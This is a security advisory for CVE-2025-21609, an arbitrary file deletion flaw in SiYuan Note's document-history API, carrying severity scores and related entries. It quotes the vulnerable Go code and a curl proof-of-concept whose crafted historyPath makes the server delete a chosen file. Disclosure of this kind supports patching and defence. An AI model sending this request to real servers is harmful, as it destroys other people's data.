GHSA-8fx8-pffw-w498

Опубликовано: 03 янв. 2025

Источник: github

Github: Прошло ревью

CVSS4: 8.7

Описание

SiYuan has an arbitrary file deletion vulnerability

Summary

A arbitrary file deletion vulnerability has been identified in the latest version of Siyuan Note. The vulnerability exists in the POST /api/history/getDocHistoryContent endpoint.An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server.

Details

The vulnerability can be reproduced by sending a crafted request to the /api/history/getDocHistoryContent endpoint.

Sending a request to the /api/history/getDocHistoryContent like:

curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'

Replace <abs_filepath_of_a_file> with the absolute file path of the target file you wish to delete.

The historyPath parameter in the payload is processed by the func getDocHistoryContent in api/history.go:133.

In turn, historyPath is passed to the func GetDocHistoryContent located in model/history.go:150 , which is the slink of the vulnerability.

if historyPath exists and does not satisfy the filesys.ParseJSONWithoutFix, then it will be deleted by os.RemoveAll

func GetDocHistoryContent(historyPath, keyword string, highlight bool) (id, rootID, content string, isLargeDoc bool, err error) { if !gulu.File.IsExist(historyPath) { logging.LogWarnf("doc history [%s] not exist", historyPath) return } data, err := filelock.ReadFile(historyPath) if err != nil { logging.LogErrorf("read file [%s] failed: %s", historyPath, err) return } isLargeDoc = 1024*1024*1 <= len(data) luteEngine := NewLute() historyTree, err := filesys.ParseJSONWithoutFix(data, luteEngine.ParseOptions) if err != nil { logging.LogErrorf("parse tree from file [%s] failed, remove it", historyPath) os.RemoveAll(historyPath) return } ... }

PoC

curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'

Impact

arbitrary file deletion vulnerability

Ссылки

Пакеты

Наименование

github.com/siyuan-note/siyuan/kernel

Затронутые версииВерсия исправления

Отсутствует

EPSS

Процентиль: 62%

0.00432

Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-21609

Дефекты

CWE-459

CWE-552

Связанные уязвимости

CVE-2025-21609

CVSS3: 9.1

nvd

около 1 года назад

SiYuan is self-hosted, open source personal knowledge management software. SiYuan Note version 3.1.18 has an arbitrary file deletion vulnerability. The vulnerability exists in the `POST /api/history/getDocHistoryContent` endpoint. An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server. Commit d9887aeec1b27073bec66299a9a4181dc42969f3 fixes this vulnerability and is expected to be available in version 3.1.19.

SUSE-SU-2025:0060-1

suse-cvrf

около 1 года назад

Security update for govulncheck-vulndb

EPSS

Процентиль: 62%

0.00432

Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-21609

Дефекты

CWE-459

CWE-552